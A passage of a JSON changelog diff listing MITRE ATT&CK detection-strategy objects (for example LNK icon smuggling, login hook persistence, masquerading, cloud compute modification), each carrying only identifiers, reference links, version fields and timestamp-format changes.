+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0405",
+                            "external_id": "DET0405"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for LNK Icon Smuggling",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--11dd0dbf-e880-43d2-99f7-4b6bf9d821fa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--156ddd81-b3ae-4a79-8c4e-7a75b6fd994c",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0183",
+                            "external_id": "DET0183"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Lateral Tool Transfer across OS platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--ce0f284b-f8d9-4cb0-84ad-97e1e8390d0c",
+                        "x-mitre-analytic--24af9441-602e-4202-a2e7-04a46c008406",
+                        "x-mitre-analytic--34d6af16-fe37-458c-b15c-413ff2d5b2f7",
+                        "x-mitre-analytic--f8857048-181f-4883-a50b-65aca5204228"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dcbcea6d-e822-4fe3-b9df-86d4d9cd5667",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0401",
+                            "external_id": "DET0401"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Launch Daemon Creation or Modification (macOS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4bb5b68e-1a01-498e-ae39-94f951e01cd9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--175b97d9-287e-4ab6-ae95-8652c224f02a",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0331",
+                            "external_id": "DET0331"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for ListPlanting Injection on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--217128c5-144d-492b-ab72-bd0704348221"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--170a958d-79a6-433a-8ab0-c8d654e2ca86",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0255",
+                            "external_id": "DET0255"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Log Enumeration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--13810047-61f4-4cd0-aeda-6727d652da90",
+                        "x-mitre-analytic--ee468e26-d179-47ba-af8b-43118db24939",
+                        "x-mitre-analytic--8f998965-ad70-4ec6-8bc1-85831edc0497",
+                        "x-mitre-analytic--42bae633-1033-40da-bf3a-87bcd1b0297f",
+                        "x-mitre-analytic--f5b9ad98-3a10-4ff3-9e25-890488253bef"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6aa65bd1-4c0c-4bf7-ba74-ba0d8edd9cb9",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0244",
+                            "external_id": "DET0244"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Login Hook Persistence on macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--7a424183-94ca-4dc1-a03b-610d174aa973"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--be7a4dda-a46a-4245-8837-e69946a79d3f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0101",
+                            "external_id": "DET0101"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Lua Scripting Abuse",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b3ea7945-a7ef-421c-be84-af86b2b95ae5",
+                        "x-mitre-analytic--f8e77c9a-2b8c-47d2-b44a-23857d246016",
+                        "x-mitre-analytic--4b53b71f-16b4-483b-b64a-eacf6c9db077",
+                        "x-mitre-analytic--755fb4b5-903f-4694-b591-04078afa27aa"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6df13a5a-7d2b-4c9d-8c6e-d57ca850fe15",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0246",
+                            "external_id": "DET0246"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for MFA Interception via Input Capture and Smart Card Proxying",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8180320e-ab62-44e5-afae-eba6ba23d769",
+                        "x-mitre-analytic--1a13d795-7c26-44b6-ad1b-2ad732dc33c3",
+                        "x-mitre-analytic--7d5eb9bd-5e53-4cf8-b86d-7136bbf8f673"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f1f9b6fc-a261-4bcf-a0c0-3ae42cdc28fc",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0383",
+                            "external_id": "DET0383"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Masquerading via Account Name Similarity",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--8c3a43bc-dd07-4e72-a987-a2dc36e162fa",
+                        "x-mitre-analytic--5f584d00-63b5-44c5-b629-ff238f5b9931",
+                        "x-mitre-analytic--0252a0ff-a4fb-4196-9b43-d759af950d55",
+                        "x-mitre-analytic--fb767270-25ad-4fea-a8e7-8f9c57ac1fa8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eccdd5b4-e19e-4254-909e-4a9c2e3ac27e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.696000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0443",
+                            "external_id": "DET0443"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Masquerading via Breaking Process Trees",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--d4a29d94-bce4-4069-a0b5-9e0e731cff97",
+                        "x-mitre-analytic--269ab5e4-4c45-4f7a-8d82-c235492ff83a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--e2d84c66-3647-4aab-962b-c1ad89455a18",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0226",
+                            "external_id": "DET0226"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Masquerading via File Type Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--557e1f6e-5eeb-46ea-bcd2-5d858eea314c",
+                        "x-mitre-analytic--e9ba7101-369f-48c6-8e6d-075ddd5744ba",
+                        "x-mitre-analytic--2bce7f8d-90c1-4835-9ce9-832e5e3a37d6"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b667390b-a805-401d-9e02-929204825114",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0347",
+                            "external_id": "DET0347"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Masquerading via Legitimate Resource Name or Location",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--61256fb2-d490-4e1d-b308-665a2d68ec64",
+                        "x-mitre-analytic--adf3e421-95ec-4b5a-9c00-0262cb888c0a",
+                        "x-mitre-analytic--466a2102-fcb3-4372-9a8d-ad8fe34e94ec",
+                        "x-mitre-analytic--c9bdc7a6-ff19-46e9-a534-fa2fd3e0a193",
+                        "x-mitre-analytic--d16be21c-6df4-4648-91cd-36152dafa38d"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--af0d25b2-1912-4821-85db-305abe318535",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0308",
+                            "external_id": "DET0308"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c9be9fb3-460f-42bc-9b56-3bb88839aeab"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--bd0b0c98-3c22-4bf8-830b-2640b39eacea",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.690000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0449",
+                            "external_id": "DET0449"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure: Create Cloud Instance",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b8ec766b-cfb9-4ef8-bd46-655f0b820ad3"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.690000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--160f132d-626e-412a-ae16-df265670c196",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.670000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0423",
+                            "external_id": "DET0423"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure: Create Snapshot",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--05af7b9b-ec1a-4d6c-a944-64a7ad0eb2f5"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.670000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--ceac3cb0-d9eb-4466-810f-4acbf793e980",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.693000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0084",
+                            "external_id": "DET0084"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure: Delete Cloud Instance",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--602def5b-49e4-4c64-afe6-1476eac13e67"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.693000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--d4586276-d188-44e7-a782-dded12dd352e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.694000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0492",
+                            "external_id": "DET0492"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detection Strategy for Modify Cloud Compute Infrastructure: Modify Cloud Compute Configurations",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--193f0293-0a53-430f-83c0-a69d0663479a"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.694000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--f5ee584b-bbbd-481a-af63-c49166b8b1a8",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.698000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
